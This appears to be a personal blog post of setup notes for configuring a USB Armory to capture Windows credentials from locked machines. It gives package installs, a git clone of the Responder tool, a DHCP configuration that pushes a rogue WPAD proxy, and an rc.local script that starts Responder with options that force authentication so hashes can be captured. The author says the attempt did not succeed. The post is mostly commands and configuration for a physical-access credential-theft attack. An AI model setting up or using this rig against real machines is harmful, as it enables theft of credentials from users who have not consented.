Braincoke

A collection of notes taken when tinkering with technology. I also have another website (link below) to record personal solutions to security challenges.

Stealing Windows Credentials with USB Armory

1 minute read

These are just notes from trying to accomplish the exploit in this post : https://room362.com/post/2016/snagging-creds-from-locked-machines/

I didn’t manage to accomplish it for now but I kept these notes if I ever need to try it again some time.

sudo apt-get update
sudo apt-get upgrade

Certificates and date

sudo apt-get install ca-certificates ssl-cert
sudo apt-get install ntp ntpdate

Python

sudo apt-get install -y python git python-pip python-dev screen sqlite3
sudo -H pip install --upgrade pip
sudo -H pip install pycrypto

Responder

git clone https://github.com/spiderlabs/responder

DHCP configuration

sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.original

sudo vim /etc/dhcp/dhcpd.conf
/etc/dhcp/dhcpd.conf
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "domain.local";
option domain-name-servers 172.16.0.1;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 172.16.0.0 netmask 255.255.255.0 {
  range 172.16.0.2 172.16.0.254;
  option routers 172.16.0.1;
  option local-proxy-config "http://172.16.0.1/wpad.dat";
}
sudo cp /etc/rc.local /etc/rc.local.original

sudo vim /etc/rc.local
/etc/rc.local
#!/bin/sh -e

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server
/usr/sbin/dhcpd

# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

exit 0
/root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

You May Also Enjoy